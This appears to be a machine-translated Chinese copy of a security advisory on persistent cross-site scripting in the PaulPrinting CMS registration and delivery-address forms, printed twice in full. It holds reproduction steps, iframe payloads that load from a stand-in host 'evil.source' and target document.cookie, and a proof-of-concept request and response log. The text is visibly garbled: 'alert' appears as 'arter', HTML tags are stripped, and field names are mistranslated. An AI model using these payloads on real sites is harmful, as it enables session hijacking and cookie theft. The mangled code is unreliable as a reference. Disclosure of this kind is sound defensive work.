利用标题: Paulprinting CMS-多个跨站点网络漏洞
参考(来源):
============================
发布日期:
=================
2023-07-19
脆弱性实验室ID(VL-ID):
==============================================
2285
常见的漏洞评分系统:
==============================================
5.8
漏洞class:
============================
跨站点脚本- 持久
当前的估计价格为:
================================
500€-1.000€
产品服务简介:
========================================
PaulPrinting设计丰富,易于使用,搜索引擎友好,现代设计以及具有视觉吸引人的界面。
(HomePage:https://codecanyon.net/user/codepaul的副本)
摘要咨询信息:
======================================
脆弱性实验室核心研究团队在Paulprinting(V2018)CMS网络应用中发现了多个持续的跨站点漏洞。
受影响的产品:
============================
Codepaul
Product: Paulprinting(2018)-CMS(Web -application)
漏洞披露时间表:
============================================
2022-08-253360研究人员通知协调(安全研究人员)
2022-08-263360供应商通知(安全部门)
2022 - ** - ** :供应商响应/反馈(安全部门)
2022 - ** - ** :供应商Fix/patch(服务开发人员团队)
2022 - ** - ** :安全性致谢(安全部门)
2023-07-19:公共披露(脆弱实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
限制身份验证(用户特权)
用户交互:
=====================
用户互动低
披露类型:
=====================
负责披露
技术详细信息描述:
=====================================
在官方PaulPrinting(V2018)CMS Web应用程序中发现了多个持久输入验证漏洞。
该漏洞使远程攻击者可以将自己的恶意脚本代码注入持久攻击向量以损害浏览器
从应用程序端向Web应用程序请求。
第一个漏洞位于寄存器模块中。远程攻击者能够用恶意脚本代码注册用户帐户。
注册后,攻击者会引起对设置的审查或通过用户审查管理的执行畸形脚本的执行
在后端(列表)中。
第二个漏洞位于交付模块中。特权较低的用户帐户的远程攻击者能够注入自己
恶意脚本代码以联系详细信息。因此允许对与用户的每次互动进行执行或通过对管理员的审查
后端(列表)。
成功剥削漏洞会导致会议劫持,持续的网络钓鱼攻击,持续的外部重定向到
恶意来源和持续操纵受影响的应用程序模块。
请求方法:
[+]帖子
弱势模块:
[+] /打印/注册
[+] /帐户/交付
脆弱的输入:
[+]名字
[+]姓氏
[+]地址
[+]城市
[+]状态
脆弱参数:
[+] firstName
[+]姓氏
[+]地址
[+]城市
[+]状态
受影响的模块:
[+]前端设置(./printing/account/setting)
[+]前端递送地址(./printing/account/delivery)
[+]后端用户预览清单
[+]后端送货地址联系评论
概念证明(POC):
================================
持续的输入验证Web漏洞可以由具有低特权用户帐户和用户交互较低的远程攻击者利用。
为了进行安全示范或复制漏洞,请遵循以下提供的信息和步骤继续进行。
重现脆弱性的手动步骤.
1。打开浏览器并开始HTTP会话篡改
2。通过登录单击在应用程序中注册以注册
3。注入标记的脆弱输入字段您的测试有效载荷
4。通过提交方法保存条目
5。登录到帐户并预览设置
Note:后端中的管理员具有与用户预览时执行的错误验证上下文
6。脚本代码在配置文件的预览时执行- 设置
7。第一个漏洞的成功复制!
8。通过打开送货地址模块的跟进
9。添加联系人并添加相同的脆弱标记输入字段您的测试有效载荷
Note:脚本代码在后端或用户前端中的每个地址的评论中执行
10。第二个漏洞的成功复制!
利用:有效载荷
'iframe src=evil.source onload(arter(document.cookie))
'iframe src=evil.source onload(arter(document.domain)
--- POC会话日志(POST)---
HOST: PAULPRINTING.LOCALHOST:8000
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,/; Q=0.8
content-type:应用程序/x-www-form-urlenceded
内容长度: 357
原始:https://paulprinting.localhost:8000
Connection:保持空白
Referer:https://paulprinting.localhost:8000/printing/account/setten
cookie:成员_login=1;成员_id=123; session_id=134446428FE6E202A3BE0E0E0CE23F0E5CD;
POST:
title=Mr.Firstname=a'iframe src=evil.source onload(alert(document.cookie))
lastName=b'iframe src=evil.source onload(alert(document.cookie)
地址=c'iframe src=evil.source onload(arter(document.cookie))
city=d'iframe src=evil.source onload(arter(document.cookie))
state=e'iframe src=evil.source onload(alert(arter(document.cookie))
zipcode=2342COUNTRY=BSPHONE=23523515235235SAVE=保存
-
POST: HTTP/3.0 302
content-type:文本/html; charset=UTF-8
X-Power-By: PHP/7.1.33
location:https://paulprinting.localhost:8000/printing/account/setting?save=1
-
HOST: PAULPRINTING.LOCALHOST:8000
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,/; Q=0.8
Referer:https://paulprinting.localhost:8000/printing/account/setten
Connection:保持空白
cookie:成员_login=1;成员_id=123; session_id=134446428FE6E202A3BE0E0E0CE23F0E5CD;
-
POST: HTTP/3.0 200好
content-type:文本/html; charset=UTF-8
X-Power-By: PHP/7.1.33
脆弱的源:您的帐户- 设置
div类='form-group行'
标签类='col-sm-4 col-form-label'first name/label
DIV类='Col-SM-8'
输入type='text'名称='firstTname'class='form-control'value='a'iframe src=evil.source onload(alert(arter(document.cookie))'
/div/div
标签类='col-sm-4 col-form-label'last名称/标签
DIV类='Col-SM-8'
输入type='text'name='lastName'class='form-control'值='b'iframe src=evil.source onload(arter(arter(document.cookie))'
/div/div
div类='form-group行'
标签类='col-sm-4 col-form-label'address/label
DIV类='Col-SM-8'
输入type='text'name='address'class='form-control'value='c'iframe src=evil.source onload(arter(arter(document.cookie))'
/div/div
div类='form-group行'
标签类='Col-SM-4 Col-form-Label'City/Label
DIV类='Col-SM-8'
输入类型='text'名称='city'class='form-control'值='d'iframe src=evil.source onload(arter(arter(document.cookie))'
/div/div
div类='form-group行'
标签类='col-sm-4 col-form-Label'state/label
DIV类='Col-SM-8'
输入type='text'name='state'class='form-control'值='e'iframe src=evil.source onload(arter(arter(document.cookie))'
/div/div
弱势源: Deliery联系人(地址)
表类='table'
斜
tr
thcontact/th
thadress/th
Thcity/th
thstate/th
thcountry/th
TH/TH
/tr
/tead
tbodytr
tda'iframe src=evil.source onload(arter(document.cookie)/td
tdb'iframe src=evil.source onload(arter(document.cookie)/td
tdc'iframe src=evil.source onload(arter(document.cookie)/td
tdd'iframe src=evil.source onload(arter(document.cookie)/td
TD/TD
TD类='text-right'
a href='https://paulprinting.localhost:8000/printing/account/exprient?id=10'edit/a |
a href='https://paulprinting.localhost:8000/printing/account/earving?id=10delete=1'onclick='return recurots escrence('delete('delete')'delete/a a
/td/tr/tbody
/桌子
安全风险:
===================
具有持续攻击矢量的跨站点脚本网络漏洞的安全风险被估计为媒介。
学分作者:
=======================
脆弱性-LAB [研究团队] -https://www.vulnerability-lab.com/show.php?user=vulnerability-lab
参考(来源):
============================
正在加载...
www.vulnerability-lab.com
=================
2023-07-19
脆弱性实验室ID(VL-ID):
==============================================
2285
常见的漏洞评分系统:
==============================================
5.8
漏洞class:
============================
跨站点脚本- 持久
当前的估计价格为:
================================
500€-1.000€
产品服务简介:
========================================
PaulPrinting设计丰富,易于使用,搜索引擎友好,现代设计以及具有视觉吸引人的界面。
(HomePage:https://codecanyon.net/user/codepaul的副本)
摘要咨询信息:
======================================
脆弱性实验室核心研究团队在Paulprinting(V2018)CMS网络应用中发现了多个持续的跨站点漏洞。
受影响的产品:
============================
Codepaul
Product: Paulprinting(2018)-CMS(Web -application)
漏洞披露时间表:
============================================
2022-08-253360研究人员通知协调(安全研究人员)
2022-08-263360供应商通知(安全部门)
2022 - ** - ** :供应商响应/反馈(安全部门)
2022 - ** - ** :供应商Fix/patch(服务开发人员团队)
2022 - ** - ** :安全性致谢(安全部门)
2023-07-19:公共披露(脆弱实验室)
发现状态:
=====================
出版
剥削技术:
================================
偏僻的
严重性级别:
===================
中等的
身份验证类型:
============================
限制身份验证(用户特权)
用户交互:
=====================
用户互动低
披露类型:
=====================
负责披露
技术详细信息描述:
=====================================
在官方PaulPrinting(V2018)CMS Web应用程序中发现了多个持久输入验证漏洞。
该漏洞使远程攻击者可以将自己的恶意脚本代码注入持久攻击向量以损害浏览器
从应用程序端向Web应用程序请求。
第一个漏洞位于寄存器模块中。远程攻击者能够用恶意脚本代码注册用户帐户。
注册后,攻击者会引起对设置的审查或通过用户审查管理的执行畸形脚本的执行
在后端(列表)中。
第二个漏洞位于交付模块中。特权较低的用户帐户的远程攻击者能够注入自己
恶意脚本代码以联系详细信息。因此允许对与用户的每次互动进行执行或通过对管理员的审查
后端(列表)。
成功剥削漏洞会导致会议劫持,持续的网络钓鱼攻击,持续的外部重定向到
恶意来源和持续操纵受影响的应用程序模块。
请求方法:
[+]帖子
弱势模块:
[+] /打印/注册
[+] /帐户/交付
脆弱的输入:
[+]名字
[+]姓氏
[+]地址
[+]城市
[+]状态
脆弱参数:
[+] firstName
[+]姓氏
[+]地址
[+]城市
[+]状态
受影响的模块:
[+]前端设置(./printing/account/setting)
[+]前端递送地址(./printing/account/delivery)
[+]后端用户预览清单
[+]后端送货地址联系评论
概念证明(POC):
================================
持续的输入验证Web漏洞可以由具有低特权用户帐户和用户交互较低的远程攻击者利用。
为了进行安全示范或复制漏洞,请遵循以下提供的信息和步骤继续进行。
重现脆弱性的手动步骤.
1。打开浏览器并开始HTTP会话篡改
2。通过登录单击在应用程序中注册以注册
3。注入标记的脆弱输入字段您的测试有效载荷
4。通过提交方法保存条目
5。登录到帐户并预览设置
Note:后端中的管理员具有与用户预览时执行的错误验证上下文
6。脚本代码在配置文件的预览时执行- 设置
7。第一个漏洞的成功复制!
8。通过打开送货地址模块的跟进
9。添加联系人并添加相同的脆弱标记输入字段您的测试有效载荷
Note:脚本代码在后端或用户前端中的每个地址的评论中执行
10。第二个漏洞的成功复制!
利用:有效载荷
'iframe src=evil.source onload(arter(document.cookie))
'iframe src=evil.source onload(arter(document.domain)
--- POC会话日志(POST)---
正在加载...
paulprinting.localhost
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,/; Q=0.8
content-type:应用程序/x-www-form-urlenceded
内容长度: 357
原始:https://paulprinting.localhost:8000
Connection:保持空白
Referer:https://paulprinting.localhost:8000/printing/account/setten
cookie:成员_login=1;成员_id=123; session_id=134446428FE6E202A3BE0E0E0CE23F0E5CD;
POST:
title=Mr.Firstname=a'iframe src=evil.source onload(alert(document.cookie))
lastName=b'iframe src=evil.source onload(alert(document.cookie)
地址=c'iframe src=evil.source onload(arter(document.cookie))
city=d'iframe src=evil.source onload(arter(document.cookie))
state=e'iframe src=evil.source onload(alert(arter(document.cookie))
zipcode=2342COUNTRY=BSPHONE=23523515235235SAVE=保存
-
POST: HTTP/3.0 302
content-type:文本/html; charset=UTF-8
X-Power-By: PHP/7.1.33
location:https://paulprinting.localhost:8000/printing/account/setting?save=1
-
正在加载...
paulprinting.localhost
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/WebP,/; Q=0.8
Referer:https://paulprinting.localhost:8000/printing/account/setten
Connection:保持空白
cookie:成员_login=1;成员_id=123; session_id=134446428FE6E202A3BE0E0E0CE23F0E5CD;
-
POST: HTTP/3.0 200好
content-type:文本/html; charset=UTF-8
X-Power-By: PHP/7.1.33
脆弱的源:您的帐户- 设置
div类='form-group行'
标签类='col-sm-4 col-form-label'first name/label
DIV类='Col-SM-8'
输入type='text'名称='firstTname'class='form-control'value='a'iframe src=evil.source onload(alert(arter(document.cookie))'
/div/div
标签类='col-sm-4 col-form-label'last名称/标签
DIV类='Col-SM-8'
输入type='text'name='lastName'class='form-control'值='b'iframe src=evil.source onload(arter(arter(document.cookie))'
/div/div
div类='form-group行'
标签类='col-sm-4 col-form-label'address/label
DIV类='Col-SM-8'
输入type='text'name='address'class='form-control'value='c'iframe src=evil.source onload(arter(arter(document.cookie))'
/div/div
div类='form-group行'
标签类='Col-SM-4 Col-form-Label'City/Label
DIV类='Col-SM-8'
输入类型='text'名称='city'class='form-control'值='d'iframe src=evil.source onload(arter(arter(document.cookie))'
/div/div
div类='form-group行'
标签类='col-sm-4 col-form-Label'state/label
DIV类='Col-SM-8'
输入type='text'name='state'class='form-control'值='e'iframe src=evil.source onload(arter(arter(document.cookie))'
/div/div
弱势源: Deliery联系人(地址)
表类='table'
斜
tr
thcontact/th
thadress/th
Thcity/th
thstate/th
thcountry/th
TH/TH
/tr
/tead
tbodytr
tda'iframe src=evil.source onload(arter(document.cookie)/td
tdb'iframe src=evil.source onload(arter(document.cookie)/td
tdc'iframe src=evil.source onload(arter(document.cookie)/td
tdd'iframe src=evil.source onload(arter(document.cookie)/td
TD/TD
TD类='text-right'
a href='https://paulprinting.localhost:8000/printing/account/exprient?id=10'edit/a |
a href='https://paulprinting.localhost:8000/printing/account/earving?id=10delete=1'onclick='return recurots escrence('delete('delete')'delete/a a
/td/tr/tbody
/桌子
安全风险:
===================
具有持续攻击矢量的跨站点脚本网络漏洞的安全风险被估计为媒介。
学分作者:
=======================
脆弱性-LAB [研究团队] -https://www.vulnerability-lab.com/show.php?user=vulnerability-lab